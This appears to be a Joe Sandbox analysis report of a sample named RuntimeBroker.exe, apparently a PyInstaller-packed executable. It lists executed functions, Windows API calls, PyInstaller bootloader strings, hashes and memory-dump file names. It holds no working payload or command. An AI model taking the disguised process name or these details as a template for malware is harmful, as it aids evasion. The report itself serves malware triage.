Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08781f5cffcd185b7b65a8c72d7d745384946f22b6caec8bbd5be90f1a2f1ed
Instruction ID: 24b054264d7f5bc573b303a99f227cab863242933d39adcf5d3e4660be96c54e
Opcode Fuzzy Hash: f08781f5cffcd185b7b65a8c72d7d745384946f22b6caec8bbd5be90f1a2f1ed
Instruction Fuzzy Hash: 71E04F3145CB088BC344EF18D44049AB7E0FF94320F800B2EF05AC71B5DB7596818A82

Function 00007FFD9B880CF3 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39566fef43db579fe1d803b1052bc9ab0328c20e281cb49caf0038af5b9ca710
Instruction ID: d4fabc39b5df375da8d3fcc4a7dcfd09ba5dfb887dcba3480868141aad0abfdc
Opcode Fuzzy Hash: 39566fef43db579fe1d803b1052bc9ab0328c20e281cb49caf0038af5b9ca710
Instruction Fuzzy Hash: 80C0123252DA4D57D351AB10E851CEA7350BF90610F801B39F05A92099DD68A6458582

Analysis Process: RuntimeBroker.exePID: 7292, Parent PID: 6864COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	655
Total number of Limit Nodes:	8

Executed Functions

Function 00007FF72B051000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF72B05391A
pkg, xrefs: 00007FF72B0537CF
pyi-runtime-tmpdir, xrefs: 00007FF72B0535D3
Failed to start splash screen!, xrefs: 00007FF72B053933
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF72B053905
_MEIPASS2, xrefs: 00007FF72B0536A2, 00007FF72B0536AE, 00007FF72B0539AC
Failed to convert DLL search path!, xrefs: 00007FF72B0538A3
MEI, xrefs: 00007FF72B05374E
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF72B0537EF
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF72B053653
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF72B053A31
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF72B053820
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF72B0536FC
Could not create temporary directory!, xrefs: 00007FF72B053838
pyi-contents-directory, xrefs: 00007FF72B0535F8
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF72B053A12
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF72B05378C
pyi-disable-windowed-traceback, xrefs: 00007FF72B05361D

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
API String ID: 514040917-585287483
Opcode ID: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
Instruction ID: c6cbb027dc0dd18342b7ebaadd52c9beb44e986c02aa15b1d28176b441667dbe
Opcode Fuzzy Hash: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
Instruction Fuzzy Hash: 1AF16061A0868251FA3AF728DD942F9E351FF44780FC48431DA5E43AB6EF2CE554DB60

Function 00007FF72B075C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B0759A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0759E9
Part of subcall function 00007FF72B0759A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B075A67
Part of subcall function 00007FF72B0759A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B075AB8

CreateFileW.KERNELBASE ref: 00007FF72B075D7A
CreateFileW.KERNEL32 ref: 00007FF72B075DCA
GetLastError.KERNEL32 ref: 00007FF72B075DFA
GetFileType.KERNELBASE ref: 00007FF72B075E0F
GetLastError.KERNEL32 ref: 00007FF72B075E19
CloseHandle.KERNEL32 ref: 00007FF72B075E4C
CloseHandle.KERNEL32 ref: 00007FF72B075FAF
CreateFileW.KERNEL32 ref: 00007FF72B075FE4
GetLastError.KERNEL32 ref: 00007FF72B075FF3

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: 112f096b2e6b38bd1263995ab04dd34f4cd571bdbe07d92a4589d685040b76e9
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: 56C1D032B28A4186EB21DF68C8906BCB761FB49B98B810225DF1E577E5CF38E451D750

Function 00007FF72B0585A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF72B0585D3
FindClose.KERNELBASE ref: 00007FF72B0585E2

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: 680089955e522658c82d14722b38f44ac43070911214bb8180b7f320603f6d4d
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: 86F04422A1974186F771AB68B89D766B350FB44768F840235DA6D02AE4DF3CE0598F14

Function 00007FF72B0518F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B0576A0: _fread_nolock.LIBCMT ref: 00007FF72B05774A

_fread_nolock.LIBCMT ref: 00007FF72B0519B4

Part of subcall function 00007FF72B052760: MessageBoxW.USER32 ref: 00007FF72B05283B

Strings

Error on file., xrefs: 00007FF72B051B0A
malloc, xrefs: 00007FF72B051AA8
calloc, xrefs: 00007FF72B0519F5
Could not read full TOC!, xrefs: 00007FF72B051AD4
fread, xrefs: 00007FF72B0519C6, 00007FF72B051ADB
MEI, xrefs: 00007FF72B051931
Could not allocate memory for archive structure!, xrefs: 00007FF72B0519EE
Failed to seek to cookie position!, xrefs: 00007FF72B051989
Could not allocate buffer for TOC!, xrefs: 00007FF72B051AA1
Failed to read cookie!, xrefs: 00007FF72B0519BF
fseek, xrefs: 00007FF72B051990

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: 990526d2b1a7d467b5ebf7f65c940fc4e17f25d2fa33dc3a7eebd26d0dc5cb7f
Instruction ID: 776e62adcac866bfbccf858c2dc779fd04f58f663f8d478aa28dd13a46b3d767
Opcode Fuzzy Hash: 990526d2b1a7d467b5ebf7f65c940fc4e17f25d2fa33dc3a7eebd26d0dc5cb7f
Instruction Fuzzy Hash: D4718771A1868695FB72EB1CD8902B9E391FF48B84F844035D98D47BA5EE2CE5858F20

Function 00007FF72B051440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B05159A
malloc, xrefs: 00007FF72B0514E0
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B05146F
fread, xrefs: 00007FF72B0515A1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B0514A9
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF72B0514D9
fseek, xrefs: 00007FF72B0514B0

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: c905a55cd8f7984cb7268f8667bb52af5d1a529dc0f7b0aa3d5b3112cccbc6ce
Instruction ID: cc7eb8a895af5d21d6c8d2f38b358e7b3d4252bfbe6d0cc80e57d439a4af5606
Opcode Fuzzy Hash: c905a55cd8f7984cb7268f8667bb52af5d1a529dc0f7b0aa3d5b3112cccbc6ce
Instruction Fuzzy Hash: 5B416121B0864281EA32BB19AC915BAE390FF487D4FD44431DE4D47EB5EE3CE9459F10

Function 00007FF72B0511F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF72B051229
malloc, xrefs: 00007FF72B05129C, 00007FF72B0512CA
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF72B0513EE
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF72B051295
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF72B051256
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF72B0512C3

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: 3a131130df1bedf4a22d54e8333a8cd57b9bb3243cddf7f37edab8269c788e58
Instruction ID: 816ac3cef8c3e02c27e524ba84ecdd96675152057e8b172679f087e8ff222af3
Opcode Fuzzy Hash: 3a131130df1bedf4a22d54e8333a8cd57b9bb3243cddf7f37edab8269c788e58
Instruction Fuzzy Hash: A451A362A0864245EA72BB19AC903BAE291FF85794F844135DE4D47FE5EF3CE941CF20

Function 00007FF72B06E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF72B06E3BA,?,?,-00000018,00007FF72B06A063,?,?,?,00007FF72B069F5A,?,?,?,00007FF72B06524E), ref: 00007FF72B06E19C
GetProcAddress.KERNEL32(?,?,?,00007FF72B06E3BA,?,?,-00000018,00007FF72B06A063,?,?,?,00007FF72B069F5A,?,?,?,00007FF72B06524E), ref: 00007FF72B06E1A8

Strings

api-ms-, xrefs: 00007FF72B06E0E6
ext-ms-, xrefs: 00007FF72B06E0F9

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: c29af694b380f90edae54ea361c0482262d6b7f358b6779e58d424d0fe77a646
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: 7C41D531B1570281FA37AB1AAC14676A391FF49B90FC84539DE0D4B7B4EE3CE5459B20

Function 00007FF72B06AD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06B199

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
Instruction ID: c05628facd73e5f65f9d56ef1470d49cacb86d7f1aecf9c9d039b9a41bce306e
Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
Instruction Fuzzy Hash: C0C1F462F0C68651E672BB1D98413BEBB90FB98B80FD90139DA5D077B1CE7CE4558B20

Function 00007FF72B0533E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF72B053534), ref: 00007FF72B053411

Part of subcall function 00007FF72B0529E0: GetLastError.KERNEL32(?,?,?,00007FF72B05342E,?,00007FF72B053534), ref: 00007FF72B052A14
Part of subcall function 00007FF72B0529E0: FormatMessageW.KERNEL32(?,?,?,00007FF72B05342E), ref: 00007FF72B052A7D
Part of subcall function 00007FF72B0529E0: MessageBoxW.USER32 ref: 00007FF72B052ACF

Strings

Failed to resolve full path to executable %ls., xrefs: 00007FF72B053461
\\?\, xrefs: 00007FF72B053482
Failed to obtain executable path., xrefs: 00007FF72B05341B
Failed to convert executable path to UTF-8., xrefs: 00007FF72B0534B8
GetModuleFileNameW, xrefs: 00007FF72B053422

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: 815b5bee0a0bd1a792fd4d617f62d4ac7f45312321708e4e32c9fc018b95912e
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: A5212C61B1864691FA32BB28EC913B9D350FF49394FC04136D69E869F5EE2CF5058F20

Function 00007FF72B064938 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B064965
CreateFileW.KERNELBASE ref: 00007FF72B0649A4
CloseHandle.KERNEL32 ref: 00007FF72B0649D9

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: c7dfdb86f8e7b35c32b853fdb9aa5c213066ecb37e5093cdda27ef89ebd06a0e
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: D341C532E1878143E365AB25995037DA260FF98764F549338D65C43AE9DF7CA1E08B20

Function 00007FF72B05BF5C Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B05C12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF72B05C140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF72B05BF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF72B05BFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF72B05C041

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: 9e72c2b248a69c027bca582dbd90e284560123b00cf7dd4417d90ab532dc5979
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: 40311A11A0864241FA76BB6C9CA53B99281FF45788FD41039EA0E47AF3DE2CF9458F35

Function 00007FF72B068D48 Relevance: 4.5, APIs: 3, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF72B068D44), ref: 00007FF72B068D59
TerminateProcess.KERNEL32(?,?,?,00007FF72B068D44), ref: 00007FF72B068D64
ExitProcess.KERNEL32 ref: 00007FF72B068D73

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction ID: 4c7431cefc51d2c3c4bc47c3569015e8213f3c240b820131c7022439265ddbcd
Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction Fuzzy Hash: 1ED06710B1970687EA7A3B785C691799351AF9C741F90143DD84A0A3B3DD2CA8495E74

Function 00007FF72B05F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B05F4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B05F597

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
Instruction ID: b3ce195ae496e00d581070107994c9237756ac34ca31e6f61d1ed744f826caba
Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
Instruction Fuzzy Hash: E551B961B0924245E636BF2D9D8067AE291FF44BA4F944634DE6D47BF5CE3CE4018F20

Function 00007FF72B069E68 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF72B069CE5,?,?,00000000,00007FF72B069D9A), ref: 00007FF72B069ED6
GetLastError.KERNEL32(?,?,?,00007FF72B069CE5,?,?,00000000,00007FF72B069D9A), ref: 00007FF72B069EE0

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 2f4644afd922b1e5157689ef8598afdfcdafe112b50f9db75b69ec44e89d1eca
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: 1721A721F1C64241EE7A7769AD5037D9291DF8C7A0F88423DDA2E47BF6CE6CE5404B20

